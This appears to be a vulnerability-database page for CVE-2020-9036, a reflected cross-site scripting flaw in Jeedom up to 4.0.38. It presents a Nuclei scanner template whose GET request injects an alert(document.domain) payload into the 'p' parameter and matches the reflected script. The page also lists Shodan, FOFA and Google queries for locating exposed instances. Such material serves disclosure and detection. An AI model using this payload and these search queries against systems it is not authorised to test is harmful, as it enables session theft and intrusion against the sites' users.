CVE-2020-9036: Jeedom <=4.0.38 - Cross-Site Scripting

2025-08-01 Jeedom PoC Public

Description

Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

PoC

id: CVE-2020-9036

info:
  name: Jeedom <=4.0.38 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability.
  reference:
    - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9036
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/my3ker/my3ker-cve-workshop
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-9036
    cwe-id: CWE-79
    epss-score: 0.03587
    epss-percentile: 0.88821
    cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: jeedom
    product: jeedom
    shodan-query: http.title:"jeedom"
    fofa-query: title="jeedom"
    google-query: intitle:"jeedom"
  tags: cve,cve2020,xss,jeedom,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>document.title = "";alert(document.domain);" - Jeedom"</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210091c5a7b077c015a9c3dc4ba763bd3407015a3278574377689978e773fa790ff9022100b0231b1deea8aff182f5a48ae4556345ac487cc1fc99cb58bda73a30e6d33941:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities